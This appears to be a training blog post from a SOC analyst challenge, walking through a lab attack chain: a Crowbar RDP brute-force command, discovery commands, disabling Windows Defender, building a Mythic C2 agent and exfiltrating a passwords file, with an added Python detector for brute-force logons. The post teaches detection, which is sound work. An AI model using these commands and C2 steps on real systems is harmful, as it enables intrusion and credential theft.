Day 21: Performing a Brute Force Attack and Using Mythic C2
Welcome to Day 21 of the 30-Day SOC Analyst Challenge! Today, we're diving into some advanced techniques used by both attackers and defenders. We'll be performing a brute force attack, generating a Mythic agent, and establishing a successful Command and Control (C2) session from a Windows server. This hands-on experience will give you valuable insights into how these attacks work and how to detect them.
Our Objective
Our goal for today is to follow this attack diagram and perform a brute force attack using Mythic C2:
1. Use Kali Linux to perform a brute force attack on our Windows server
2. Perform discovery commands
3. Implement defense evasion techniques
4. Use Mythic C2 to generate a payload and create a Mythic agent
5. Download and execute the Mythic agent on the Windows server
6. Establish a C2 connection and exfiltrate a password file
Setting Up the Environment
Before we begin, let's set up our Windows server:
1. Create a file called "passwords.txt" in the Documents folder
2. Change the administrator password to "Summer2024!"
3. Modify the Group Policy to allow weaker passwords
Phase 1: Brute Force Attack
We'll use a tool called Crowbar to perform the brute force attack:
1. Create a wordlist with common passwords
2. Add our target password to the list
3. Run Crowbar against the Windows server
crowbar -b rdp -u administrator -C my_dfir_wordlist.txt -s 149.248.59.41/32
Within seconds, we successfully obtained the credentials!
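As the defender-side counterpart to the Crowbar run above (an added example, not code from the original post), here is a small Python detector for the pattern that run leaves in the Windows Security log: a burst of failed logons (Event ID 4625) from one source IP against one account, followed by a successful logon (4624) from the same IP. The pipe-delimited line format and the sample events are constructed for illustration; in practice you would feed it 4625/4624 records exported from the server or your SIEM.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESS_LOGON = 4625, 4624
RDP_LOGON_TYPES = {3, 10}  # Network and RemoteInteractive; RDP auth shows up as either
TIME_FMT = "%Y-%m-%d %H:%M:%S"


def parse_event(line):
    """Parse one constructed 'timestamp|event_id|user|source_ip|logon_type' line."""
    ts, eid, user, ip, ltype = line.split("|")
    return datetime.strptime(ts, TIME_FMT), int(eid), user.lower(), ip, int(ltype)


def detect_brute_force(lines, threshold=10, window=timedelta(minutes=5)):
    """Alert on (source_ip, user) pairs with >= threshold failures inside `window`.
    success_after is set when a 4624 from that pair follows the burst, which is
    the 'guessed it' outcome shown in the Crowbar phase above."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e[0])
    failures = defaultdict(list)  # (ip, user) -> timestamps of recent 4625s
    alerts = {}
    for ts, eid, user, ip, ltype in events:
        if ltype not in RDP_LOGON_TYPES:
            continue
        key = (ip, user)
        if eid == FAILED_LOGON:
            recent = [t for t in failures[key] if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(key, {"source_ip": ip, "user": user,
                                                "first_seen": recent[0], "success_after": False})
                alert["failures"] = len(recent)
        elif eid == SUCCESS_LOGON and key in alerts:
            alerts[key]["success_after"] = True  # burst ended in a valid logon
    return list(alerts.values())


def constructed_events():
    """Constructed sample log: 12 rapid failures then a success from one IP (attack),
    plus two isolated typos and a normal logon from another user (benign noise)."""
    base = datetime(2024, 8, 1, 10, 0, 0)
    stamp = lambda **kw: (base + timedelta(**kw)).strftime(TIME_FMT)
    lines = [f"{stamp(seconds=i)}|4625|Administrator|203.0.113.7|3" for i in range(12)]
    lines.append(f"{stamp(seconds=12)}|4624|Administrator|203.0.113.7|10")
    lines += [f"{stamp(minutes=m)}|4625|jsmith|198.51.100.5|3" for m in (1, 30)]
    lines.append(f"{stamp(minutes=2)}|4624|jsmith|198.51.100.5|10")
    return lines


if __name__ == "__main__":
    for alert in detect_brute_force(constructed_events()):
        print(alert)
```

Tune `threshold` and `window` to your environment's normal mistype rate; the `success_after` flag is what separates a noisy scan from a credential compromise that needs immediate response.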
Phase 2: Discovery
After gaining access, we performed some basic discovery commands:
- whoami
- ipconfig
- net user
- net group
These commands help an attacker understand the environment they've compromised.
Phase 3: Defense Evasion
To avoid detection, we disabled Windows Defender through the GUI. In a real-world scenario, this might be done more stealthily through PowerShell or command-line tools.
Phase 4: Execution - Building the Mythic Agent
Now, let's set up our Mythic C2 server:
1. Install the Apollo agent
./mythic-cli install github https://github.com/MythicAgents/apollo
Install HTTP C2 profile
./mythic-cli install github https://github.com/MythicC2Profiles/http
You will now be able to see the Apollo agent and the HTTP C2 profile in your Mythic GUI.
2. Generate a new payload with custom settings
Click on the Actions button on the top right corner and then select Generate New Payload.
You will see the following screen. In the Callback Host field, enter the public IP address of your Mythic server (the host the agent will call back to) and set the callback port to 80. Click Next, then Generate Payload.
3. Download the payload to our Mythic server
Phase 5: Establishing the C2 Connection
Execute the Payload
Run the downloaded executable on the compromised Windows server. Once it runs, a new callback appears in the Mythic GUI.
Phase 6: Exfiltration
Finally, we used our C2 session to exfiltrate the "passwords.txt" file we created earlier:
download C:\Users\Administrator\Documents\passwords.txt
The file was successfully downloaded to our Mythic server, completing our attack chain.
Conclusion
Today's challenge gave us hands-on experience with several advanced techniques used in real-world attacks. Understanding these methods is crucial for SOC analysts to effectively detect and respond to threats.
Remember, these skills should only be used ethically and legally. Always practice in controlled, authorized environments.
IT Manager at Global Blue Portugal | Digital Technology and CRM Specialist
6 months
Diving into those advanced techniques sounds intense! Really highlights how vital it is to stay ahead in the cybersecurity game. Curious about your thoughts on balancing security and usability?